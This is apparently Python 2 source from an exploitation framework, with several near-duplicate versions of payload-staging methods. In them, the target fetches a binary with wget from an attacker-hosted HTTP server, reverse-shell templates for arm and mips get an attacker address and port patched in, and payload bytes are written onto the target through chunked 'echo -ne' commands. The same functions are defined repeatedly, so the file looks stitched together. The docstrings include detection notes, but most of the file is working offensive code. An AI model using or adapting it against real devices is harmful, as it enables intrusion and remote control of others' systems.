def wget(self):
    """Stage the payload over HTTP and have the target fetch it with wget.

    Starts ``self.http_server`` in a background thread on the configured
    ``lhost``/``lport``, spins until ``self.mutex`` is cleared, then passes
    one download command to ``self.exploit.execute``.

    Returns:
        False if ``self.port_used`` is set once the wait is over, True after
        the download command has been handed to ``self.exploit.execute``.

    Detection note: the command has the fixed shape
    ``<binary> http://<lhost>:<lport>/<name> -O <location>/<name>``, with
    ``<name>`` taken from ``random_text(8)``, so it surfaces as one
    downloader invocation wherever command or process logging exists.
    """
    print_status("Using wget method")
    self.binary_name = random_text(8)

    # The module may name a different downloader; "wget" is the fallback.
    binary = self.wget_options['binary'] if "binary" in self.wget_options.keys() else "wget"

    # self.mutex is used as a spin flag. Presumably http_server() clears it
    # once it has either bound the port or failed -- confirm in http_server.
    self.mutex = True
    server = threading.Thread(
        target=self.http_server,
        args=(self.options['lhost'], self.options['lport']),
    )
    server.start()
    while self.mutex:
        pass

    if self.port_used:
        print_error("Could not set up HTTP Server on {}:{}".format(
            self.options['lhost'], self.options['lport']))
        return False

    print_status("Using wget to download binary")
    fields = (
        binary,
        self.options['lhost'],
        self.options['lport'],
        self.binary_name,
        self.location,
        self.binary_name,
    )
    self.exploit.execute("{} http://{}:{}/{} -O {}/{}".format(*fields))
    return True
def wget(self):
    """Serve the payload from a local HTTP server and trigger a wget fetch.

    The method picks a fresh ``self.binary_name``, launches
    ``self.http_server`` on ``lhost``/``lport`` in its own thread, waits for
    ``self.mutex`` to drop, and then sends a single download command through
    ``self.exploit.execute``.

    Returns:
        True when the download command was issued; False when
        ``self.port_used`` is set after the wait (an error is printed).

    Detection note: the issued command always reads
    ``<binary> http://<lhost>:<lport>/<name> -O <location>/<name>``; the
    same ``<name>`` appears in both the URL path and the output path.
    """
    print_status("Using wget method")
    self.binary_name = random_text(8)

    # Default downloader, replaced when the options carry a "binary" entry.
    binary = "wget"
    if "binary" in self.wget_options.keys():
        binary = self.wget_options['binary']

    # Busy-wait on a flag; presumably http_server() resets self.mutex and
    # sets self.port_used when the bind fails -- verify against http_server.
    self.mutex = True
    listener = threading.Thread(target=self.http_server,
                                args=(self.options['lhost'], self.options['lport']))
    listener.start()
    while self.mutex:
        pass

    if not self.port_used:
        print_status("Using wget to download binary")
        command = "{} http://{}:{}/{} -O {}/{}".format(
            binary,
            self.options['lhost'],
            self.options['lport'],
            self.binary_name,
            self.location,
            self.binary_name,
        )
        self.exploit.execute(command)
        return True

    print_error("Could not set up HTTP Server on {}:{}".format(self.options['lhost'],
                                                               self.options['lport']))
    return False
def generate_binary(self, lhost, lport):
    """Build ``self.revshell`` by splicing an address and port into a template.

    ``lhost`` and ``lport`` are converted with ``self.convert_ip`` and
    ``self.convert_port`` and inserted at fixed offsets of the prebuilt
    template for ``self.arch`` (``self.arm``, ``self.mipsel`` or
    ``self.mips``). For any other architecture an error is printed and
    ``self.revshell`` is not assigned. Nothing is returned.

    Patched ranges (the gaps between the slices below):
        arm:    address 0x104-0x108, port 0x10A-0x10C
        mipsel: port 0xE4-0xE6, ip[2:] at 0xF0-0xF2, ip[:2] at 0xF4-0xF6
        mips:   port 0xEA-0xEC, ip[:2] at 0xF2-0xF4, ip[2:] at 0xF6-0xF8

    Analysis note: every byte outside those ranges is copied unchanged from
    the template, so the unpatched regions are the same for every binary
    this method produces for a given architecture.
    """
    print_status("Generating reverse shell binary")
    self.binary_name = random_text(8)

    # Gap widths suggest a 4-byte address and a 2-byte port -- confirm
    # against convert_ip / convert_port.
    ip = self.convert_ip(lhost)
    port = self.convert_port(lport)

    arch = self.arch
    if arch == "arm":
        tpl = self.arm
        self.revshell = tpl[:0x104] + ip + tpl[0x108:0x10A] + port + tpl[0x10C:]
        return

    if arch == "mipsel":
        tpl = self.mipsel
        # The two address halves are stored in swapped order, low half first.
        self.revshell = (
            tpl[:0xE4] + port
            + tpl[0xE6:0xF0] + ip[2:]
            + tpl[0xF2:0xF4] + ip[:2]
            + tpl[0xF6:]
        )
        return

    if arch == "mips":
        tpl = self.mips
        self.revshell = (
            tpl[:0xEA] + port
            + tpl[0xEC:0xF2] + ip[:2]
            + tpl[0xF4:0xF6] + ip[2:]
            + tpl[0xF8:]
        )
        return

    print_error("Platform not supported")
def generate_binary(self, lhost, lport):
    """Patch the callback address and port into an arm or mipsel template.

    The converted ``lhost``/``lport`` values replace fixed byte ranges of
    ``self.arm`` or ``self.mipsel`` (chosen by ``self.arch``) and the result
    is stored in ``self.revshell``. Other architectures only produce an
    error message; ``self.revshell`` is left untouched. Returns None.

    Analysis note: only the ranges skipped by the slices below differ from
    the stored template, so the rest of the output is constant per
    architecture.
    """
    print_status("Generating reverse shell binary")
    self.binary_name = random_text(8)

    # Slice gaps are 4 bytes (address) and 2 bytes (port) wide; presumably
    # convert_ip / convert_port return values of exactly those sizes.
    ip = self.convert_ip(lhost)
    port = self.convert_port(lport)

    if self.arch == 'arm':
        # address replaces 0x104-0x108, port replaces 0x10a-0x10c
        head = self.arm[:0x104]
        middle = self.arm[0x108:0x10a]
        tail = self.arm[0x10c:]
        self.revshell = head + ip + middle + port + tail
    elif self.arch == 'mipsel':
        # port replaces 0xe4-0xe6; the address is written as two halves in
        # swapped order: ip[2:] at 0xf0-0xf2, then ip[:2] at 0xf4-0xf6
        patched = self.mipsel[:0xe4] + port
        patched = patched + self.mipsel[0xe6:0xf0] + ip[2:]
        patched = patched + self.mipsel[0xf2:0xf4] + ip[:2]
        self.revshell = patched + self.mipsel[0xf6:]
    else:
        print_error("Platform not supported")
def generate_binary(self, lhost, lport):
    """Produce ``self.revshell`` from the template matching ``self.arch``.

    ``self.convert_ip(lhost)`` and ``self.convert_port(lport)`` supply the
    bytes that overwrite fixed ranges of ``self.arm``, ``self.mipsel`` or
    ``self.mips``. An unrecognised architecture prints an error and leaves
    ``self.revshell`` unassigned. The method has no return value.

    Analysis note: bytes outside the overwritten ranges come straight from
    the template, so they are identical across every build for the same
    architecture.
    """
    print_status("Generating reverse shell binary")
    self.binary_name = random_text(8)

    # Presumably 4 address bytes and 2 port bytes, matching the width of
    # the ranges skipped below -- confirm in convert_ip / convert_port.
    ip = self.convert_ip(lhost)
    port = self.convert_port(lport)

    if self.arch == 'arm':
        base = self.arm
        # skipped ranges: 0x104-0x108 (address) and 0x10a-0x10c (port)
        pieces = (base[:0x104], ip, base[0x108:0x10a], port, base[0x10c:])
        self.revshell = pieces[0] + pieces[1] + pieces[2] + pieces[3] + pieces[4]
    elif self.arch == 'mipsel':
        base = self.mipsel
        # skipped ranges: 0xe4-0xe6 (port), 0xf0-0xf2 and 0xf4-0xf6 (address
        # halves, second half first)
        self.revshell = (base[:0xe4] + port + base[0xe6:0xf0] + ip[2:]
                         + base[0xf2:0xf4] + ip[:2] + base[0xf6:])
    elif self.arch == 'mips':
        base = self.mips
        # skipped ranges: 0xea-0xec (port), 0xf2-0xf4 and 0xf6-0xf8 (address
        # halves, first half first)
        self.revshell = (base[:0xea] + port + base[0xec:0xf2] + ip[:2]
                         + base[0xf4:0xf6] + ip[2:] + base[0xf8:])
    else:
        print_error("Platform not supported")
def echo(self):
    """Write ``self.payload`` to the target in chunks of escaped echo output.

    The payload is cut into blocks of ``max_length`` bytes (default 30).
    Each block is hex-encoded, every byte is prefixed with ``prefix``
    (default ``\\x``), and the result is placed into the ``stream``
    template (default ``echo -ne "{}" >> {}``) together with the destination
    path ``<location>/<binary_name>``. One command per block is handed to
    ``self.exploit.execute``. Nothing is returned.

    The code relies on Python 2 behaviour: ``str.encode('hex')`` and integer
    ``/`` division.

    Detection note: with the defaults this yields a run of
    ``echo -ne "\\xNN..." >> <path>`` commands that all append to the same
    file, each carrying at most 30 escaped bytes.
    """
    print_status("Using echo method")
    self.binary_name = random_text(8)
    path = "{}/{}".format(self.location, self.binary_name)

    # Command template; first slot is the escaped block, second the path.
    echo_stream = (self.echo_options['stream']
                   if "stream" in self.echo_options.keys()
                   else 'echo -ne "{}" >> {}')

    # Escape prefix placed in front of every hex byte.
    echo_prefix = (self.echo_options['prefix']
                   if "prefix" in self.echo_options.keys()
                   else "\\x")

    # Number of payload bytes carried by one command.
    echo_max_length = (int(self.echo_options['max_length'])
                       if "max_length" in self.echo_options.keys()
                       else 30)

    size = len(self.payload)
    num_parts = (size / echo_max_length) + 1

    print_status("Sending payload to {}".format(path))
    for index in range(num_parts):
        start = index * echo_max_length
        print_status("Transferring {}/{} bytes".format(start, len(self.payload)))

        hexed = self.payload[start:start + echo_max_length].encode('hex')
        # Hex output has two characters per byte; regroup them into pairs.
        byte_pairs = [hexed[pos:pos + 2] for pos in range(0, len(hexed), 2)]
        escaped = echo_prefix + echo_prefix.join(byte_pairs)

        self.exploit.execute(echo_stream.format(escaped, path))
def echo(self):
    """Transfer ``self.payload`` as a series of appended echo commands.

    Options read from ``self.echo_options`` (each optional):
        stream:     command template, default ``echo -ne "{}" >> {}``
        prefix:     per-byte escape prefix, default ``\\x``
        max_length: payload bytes per command, default 30

    For every block the hex form of the bytes is rewritten as
    ``<prefix>NN<prefix>NN...`` and formatted into the template with the
    destination ``<location>/<binary_name>``; the command then goes to
    ``self.exploit.execute``. The method returns None.

    Written for Python 2 (``str.encode('hex')``, integer ``/``).

    Detection note: all commands append to one path and differ only in the
    escaped block, so the transfer shows up as many near-identical
    ``echo -ne`` lines in command logging.
    """
    print_status("Using echo method")
    self.binary_name = random_text(8)
    path = "{}/{}".format(self.location, self.binary_name)

    # Defaults first, then overrides in the same order the options are read.
    echo_stream = 'echo -ne "{}" >> {}'
    if "stream" in self.echo_options.keys():
        echo_stream = self.echo_options['stream']

    echo_prefix = "\\x"
    if "prefix" in self.echo_options.keys():
        echo_prefix = self.echo_options['prefix']

    echo_max_length = 30
    if "max_length" in self.echo_options.keys():
        echo_max_length = int(self.echo_options['max_length'])

    size = len(self.payload)
    num_parts = (size / echo_max_length) + 1

    print_status("Sending payload to {}".format(path))
    part = 0
    while part < num_parts:
        current = part * echo_max_length
        print_status("Transferring {}/{} bytes".format(current, len(self.payload)))

        chunk_hex = self.payload[current:current + echo_max_length].encode('hex')
        # Pair up the high and low nibble characters of each byte.
        pairs = []
        for high, low in zip(chunk_hex[::2], chunk_hex[1::2]):
            pairs.append(high + low)
        block = echo_prefix + echo_prefix.join(pairs)

        cmd = echo_stream.format(block, path)
        self.exploit.execute(cmd)
        part += 1
def __init__(self, exploit, payload, options):
    """Store the collaborators and pick a name for the dropped file.

    Args:
        exploit: object kept as ``self.exploit``.
        payload: data kept as ``self.payload``.
        options: settings kept as ``self.options``.

    ``self.binary_name`` is set from ``random_text(8)``, a helper defined
    outside this block.
    """
    self.exploit, self.payload, self.options = exploit, payload, options
    self.binary_name = random_text(8)